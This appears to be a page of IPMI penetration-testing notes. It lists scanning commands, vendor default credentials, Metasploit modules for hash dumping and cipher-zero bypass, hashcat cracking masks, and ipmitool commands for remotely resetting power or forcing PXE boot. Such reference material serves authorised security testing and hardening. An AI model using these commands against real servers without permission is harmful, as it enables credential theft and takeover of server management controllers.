IPMI Pentesting Notes

Protocol Overview

Basic Information

  • Port: UDP 623

  • Protocol Type: Hardware management protocol

  • Purpose: Remote server management and monitoring

  • Security: Various authentication methods, often poorly configured

Key Components

  1. BMC (Baseboard Management Controller)

    • Embedded Linux system

    • Independent of host OS

    • Manages hardware directly

  2. Common Implementations

    • HP iLO (Integrated Lights Out)

    • Dell iDRAC

    • Supermicro IPMI

    • IBM IMM

Initial Enumeration

Port Scanning

# Basic UDP scan
sudo nmap -sU -p 623 <target>

# Version detection
sudo nmap -sU -p 623 -sV <target>

# IPMI-specific scripts
sudo nmap -sU -p 623 --script ipmi-* <target>

Version Detection

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <target>
run

# Using nmap
sudo nmap -sU --script ipmi-version -p 623 <target>

# Using ipmitool
ipmitool -I lanplus -H <target> -p 623 chassis status

Default Credentials

Common Defaults

Vendor
Username
Password

Dell iDRAC

root

calvin

HP iLO

Administrator

<8-char random>

Supermicro

ADMIN

ADMIN

IBM IMM

USERID

PASSW0RD

Testing Default Access

# Using ipmitool
ipmitool -I lanplus -H <target> -U root -P calvin chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Password Attacks

Hash Dumping

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Using Python
mkdir output
python3 ipmipwner.py --host <target> --output ./output

Cracking Hashes

# IPMI v2.0 RAKP HMAC-SHA1 hashes
hashcat -m 7300 hashes.txt wordlist.txt

# Custom mask for HP iLO defaults (8 chars, uppercase + numbers)
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

# Using John
john --format=rakp hashes.txt

Common NSE Scripts

# Run all IPMI scripts
sudo nmap -sU -p 623 --script ipmi-* <target>

# Important individual scripts
sudo nmap -sU -p 623 --script ipmi-version <target>      # Version detection
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>  # Cipher zero auth
sudo nmap -sU -p 623 --script ipmi-brute <target>        # Brute force

Exploitation Techniques

Cipher Zero Authentication

# Check for cipher zero
sudo nmap -sU -p 623 --script ipmi-cipher-zero <target>

# Exploit using ipmitool
ipmitool -I lanplus -H <target> -U '' -P '' -C 0 chassis status

# Using Metasploit
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <target>
run

RAKP Authentication Bypass

# Dump RAKP hashes
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <target>
run

# Offline cracking
hashcat -m 7300 rakp.txt wordlist.txt

Post Exploitation

Information Gathering

# Get system info
ipmitool -I lanplus -H <target> -U username -P password fru print

# Get sensor data
ipmitool -I lanplus -H <target> -U username -P password sensor list

# Get user list
ipmitool -I lanplus -H <target> -U username -P password user list

System Control

# Power operations
ipmitool -I lanplus -H <target> -U username -P password chassis power status
ipmitool -I lanplus -H <target> -U username -P password chassis power reset

# Boot device control
ipmitool -I lanplus -H <target> -U username -P password chassis bootdev pxe

Common Vulnerabilities

  1. Authentication Issues:

    • Default credentials

    • Cipher Zero authentication

    • RAKP authentication bypass

    • Weak password policies

  2. Configuration Problems:

    • Exposed IPMI interfaces

    • Outdated firmware

    • Missing patches

    • Weak network restrictions

  3. Known CVEs:

    • CVE-2013-4786 (Cipher Zero)

    • CVE-2013-4787 (IPMI 2.0 RAKP Authentication)

    • Multiple HP iLO vulnerabilities

Response Codes and Messages

Code
Meaning

0x00

Success

0xC0

Node Busy

0xC1

Invalid Command

0xC3

Timeout

0xC4

Out of Space

0xC5

Invalid Data

0xFF

Unspecified Error

Best Practices for Pentesting

  1. Initial Reconnaissance:

    • Port discovery

    • Version detection

    • Default credential testing

    • Cipher support checking

  2. Deep Enumeration:

    • User enumeration

    • Hash dumping

    • Vulnerability scanning

    • Configuration analysis

  3. Documentation:

    • Version information

    • Found credentials

    • Vulnerable configurations

    • Successful exploits

  4. Risk Assessment:

    • Physical access implications

    • Network exposure

    • Credential security

    • Patch status

Common Tools Summary

  1. Enumeration:

    • nmap

    • ipmitool

    • Metasploit modules

    • Custom Python scripts

  2. Exploitation:

    • Metasploit

    • hashcat

    • John the Ripper

    • ipmitool

  3. Post-Exploitation:

    • ipmitool

    • IPMI management interfaces

    • Custom scripts

    • Web interfaces

PreviousSSH Pentesting NotesNextOracle TNS Pentesting Notes